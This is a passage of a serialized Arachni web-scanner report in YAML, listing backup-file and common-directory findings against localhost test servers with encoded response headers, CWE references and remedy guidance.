can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move the
files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
opts:
:regexp: ''
url: http://localhost:8405/Copy%20of%20some_filename.php
injected: Copy%20of%20some_filename.php
id: Copy%20of%20some_filename.php
elem: path
remarks: {}
method: ''
response: Copy%20of%20some_filename.php
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Mjk=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move
the files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations: []
internal_modname: BackupFiles
internal_modname: BackupFiles
- !ruby/object:Arachni::Issue
verification: false
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
url: http://localhost:8405/Copy%20of%20some_filename
elem: path
method: ''
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move the
files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml
opts:
:regexp: ''
url: http://localhost:8405/Copy%20of%20some_filename
injected: Copy%20of%20some_filename
id: Copy%20of%20some_filename
elem: path
remarks: {}
method: ''
response: Copy%20of%20some_filename
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MjU=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Backup file
description: ! "The server response indicates that a file matching\n the name
of a common naming scheme for file backups can be publicly accessible.\n A
developer has probably forgotten to remove this file after testing.\n This
can lead to source code disclosure and privileged information leaks."
tags:
- path
- backup
- file
- discovery
severity: Medium
remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual
web server root.\n When updating the site, delete or move
the files to a directory outside the virtual root, edit them there,\n and
move (or copy) the files back to the virtual root. Make sure that only the files
that are actually in use reside under the virtual root."
mod_name: Backup files
variations: []
internal_modname: BackupFiles
internal_modname: BackupFiles
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/_private/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/_private/
injected: _private
id: _private
elem: path
remarks: {}
method: ''
response: _private
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
OA==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMiBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/_vti_bin/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/_vti_bin/
injected: _vti_bin
id: _vti_bin
elem: path
remarks: {}
method: ''
response: _vti_bin
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
OA==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMiBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/cgi-sys/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/cgi-sys/
injected: cgi-sys
id: cgi-sys
elem: path
remarks: {}
method: ''
response: cgi-sys
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Nw==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMiBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/cgi-bin/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/cgi-bin/
injected: cgi-bin
id: cgi-bin
elem: path
remarks: {}
method: ''
response: cgi-bin
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Nw==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMiBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/mailman/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/mailman/
injected: mailman
id: mailman
elem: path
remarks: {}
method: ''
response: mailman
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Nw==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMiBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/iishelp/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/iishelp/
injected: iishelp
id: iishelp
elem: path
remarks: {}
method: ''
response: iishelp
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Nw==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMiBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/iisadmin/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/iisadmin/
injected: iisadmin
id: iisadmin
elem: path
remarks: {}
method: ''
response: iisadmin
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
OA==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMiBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/uploader/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/uploader/
injected: uploader
id: uploader
elem: path
remarks:
:stuff:
- Blah
- Blah2
method: ''
response: uploader
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
OA==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMiBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/tsweb/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/tsweb/
injected: tsweb
id: tsweb
elem: path
remarks: {}
method: ''
response: tsweb
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NQ==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMiBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/uploads/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/uploads/
injected: uploads
id: uploads
elem: path
remarks: {}
method: ''
response: uploads
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Nw==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/default/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/default/
injected: default
id: default
elem: path
remarks: {}
method: ''
response: default
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Nw==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMiBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/query/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/query/
injected: query
id: query
elem: path
remarks: {}
method: ''
response: query
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NQ==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/example/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/example/
injected: example
id: example
elem: path
remarks: {}
method: ''
response: example
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
